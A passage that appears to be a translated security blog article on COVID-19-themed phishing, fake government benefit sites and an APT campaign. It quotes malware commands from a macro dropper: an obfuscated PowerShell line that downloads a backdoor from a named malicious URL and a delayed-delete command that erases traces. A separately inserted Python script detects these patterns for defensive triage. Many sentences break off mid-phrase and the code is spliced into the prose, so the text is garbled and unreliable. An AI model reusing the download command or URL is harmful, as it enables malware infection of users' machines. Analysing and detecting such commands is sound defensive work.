Attackers continue to exploit the COVID-19 theme, creating more and more threats for users who are keenly interested in everything related to the epidemic. In
Recall in
Would you like a free COVID-19 test?
Another notable example of coronavirus-themed phishing was
Convincing most users to enable macros was also easy. A standard trick was used for this: to fill out the questionnaire, you first have to enable macros, which means you have to run a VBA script.
As you can see, the VBA script is heavily obfuscated to hide it from antivirus products.
Windows has a wait feature in which an application waits /T <seconds> before accepting the default "Yes" answer. In our case, the script waited 65 seconds before deleting the temporary files:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\Users\Public\tmpdir\tmps1.bat & del C:\Users\Public\1.txt
And during the wait, the malware was downloaded. A special PowerShell script was launched for this:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:\Users\Public\1.txt
After decoding the Base64 value, the PowerShell script downloads a backdoor located on a previously hacked web server from Germany:
http://automatischer-staubsauger.com/feature/777777.png
and saves it under the name:
C:\Users\Public\tmpdir\file1.exe
The folder 'C:\Users\Public\tmpdir' is deleted when running the 'tmps1.bat' file, which contains the command cmd /c mkdir ""C:\Users\Public\tmpdir"".
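The two commands above can be triaged from process command-line logs. The following Python example is added here and is not code from the original article: it resolves the Base64 literals and the '1' + '.e' + 'x' + 'e' concatenation, then flags a download whose URL extension differs from the saved file's extension, and the choice /T delay followed by del. The sample command lines are constructed, the URL is a placeholder, and the finding names are hypothetical.

```python
import base64
import re

# [<type>]::ASCII.GetString([<type>]::FromBase64String('...')), as in the command above
B64_EXPR = re.compile(
    r"\[[\w.]+\]::(?:ASCII|UTF8)\.GetString\(\s*\[[\w.]+\]::FromBase64String\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)", re.I)
CONCAT = re.compile(r"(?:'[^']*'\s*\+\s*)+'[^']*'")      # 'a' + 'b' + 'c'
DOWNLOAD = re.compile(r"\.DownloadFile\(\s*'([^']*)'\s*,\s*'([^']*)'\s*\)", re.I)
DELAYED_DELETE = re.compile(r"\bchoice\b[^&]*?/T\s+(\d+)\s*&\s*del\b", re.I)

def _decode(match):
    try:
        text = base64.b64decode(match.group(1), validate=True).decode("ascii")
    except ValueError:      # bad Base64 or non-ASCII: leave the expression untouched
        return match.group(0)
    return match.group(0) if "'" in text else "'" + text + "'"

def deobfuscate(cmdline):
    """Resolve Base64 literals, then fold quoted fragments joined with '+'."""
    fold = lambda m: "'" + "".join(re.findall(r"'([^']*)'", m.group(0))) + "'"
    return CONCAT.sub(fold, B64_EXPR.sub(_decode, cmdline))

def triage(cmdline):
    """Return findings for one logged command line (finding names are illustrative)."""
    findings = []
    found = DOWNLOAD.search(deobfuscate(cmdline))
    if found:
        url, dest = found.groups()
        findings.append(("download", url, dest))
        url_ext, dest_ext = (s.rsplit(".", 1)[-1].lower() for s in (url, dest))
        if dest_ext in ("exe", "dll", "scr") and url_ext != dest_ext:
            findings.append(("extension-mismatch", url_ext, dest_ext))
    delay = DELAYED_DELETE.search(cmdline)
    if delay:
        findings.append(("delayed-delete", int(delay.group(1))))
    return findings

# Constructed sample input, encoded at run time; the URL is a placeholder.
def _expr(text):
    b64 = base64.b64encode(text.encode("ascii")).decode("ascii")
    return "[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('%s'))" % b64

SAMPLE_DOWNLOAD = ("cmd /C powershell -Command (New-Object Net.WebClient).DownloadFile("
                   + _expr("http://example.invalid/feature/picture.png") + ", "
                   + _expr("C:\\Users\\Public\\tmpdir\\file") + " + '1' + '.e' + 'x' + 'e')")
SAMPLE_CLEANUP = "cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:\\Users\\Public\\tmpdir\\tmps1.bat"

if __name__ == "__main__":
    print(triage(SAMPLE_DOWNLOAD), triage(SAMPLE_CLEANUP))
```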
Targeted attacks on government organizations
In addition, FireEye analysts recently reported a targeted APT32 attack aimed at government structures in Wuhan, as well as the Chinese Ministry of Emergency Management. One of the distributed RTFs contained a link to a New York Times article titled
Interestingly, at the time of detection, not a single antivirus detected this sample, according to Virustotal.
When official websites are down
A striking example of a phishing attack happened in Russia the other day. The occasion was the introduction of a long-awaited benefit for children aged three to sixteen. When the start of accepting applications was announced on May 3, 16, millions rushed to the State Services website for the long-awaited help and brought the portal down no worse than a professional DDoS attack. When the head of state said that "State Services could not cope with the flow of applications," people started talking online about the launch of an alternative site for accepting applications.
The problem is that several sites started working at once, and while one, the real one at posobie16.gosuslugi.ru, actually accepts applications, the others.
Colleagues from SearchInform found about thirty fraudulent domains in the .ru zone. Infosecurity and Softline Company have tracked more than seventy fake government services websites since the beginning of April. Their creators manipulate familiar symbols and also use combinations of the words gosuslugi, gosuslugi-30, vyplaty, covid-vyplaty, posobie, and so on.
Hype and social engineering
All these examples only confirm that attackers are successfully monetizing the coronavirus topic. And the higher the social tension and the more unclear issues there are, the greater the chances for scammers to steal important data, force people to hand over their own money, or simply hack more computers.
And given that the pandemic has forced potentially unprepared people to work from home en masse, not only personal but also corporate data is at risk. For example, Microsoft 365 (formerly Office 365) users were recently also subjected to a phishing attack. People received bulk "missed" voice messages as attachments to emails. However, the files were actually an HTML page that sent the victims of the attack
Source: www.habr.com